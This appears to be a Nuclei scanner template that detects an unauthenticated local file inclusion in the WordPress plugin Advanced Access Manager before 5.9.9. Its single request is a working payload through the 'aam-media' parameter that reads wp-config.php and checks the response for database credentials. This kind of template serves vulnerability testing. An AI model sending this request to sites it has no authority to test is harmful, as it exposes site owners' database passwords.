id: advanced-access-manager-plugin-lfi

info:
  name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
  author: 0x_Akoko
  severity: high
  tags: wordpress,wp-plugin,lfi,wp
  reference: https://wpscan.com/vulnerability/9873

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?aam-media=wp-config.php '

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
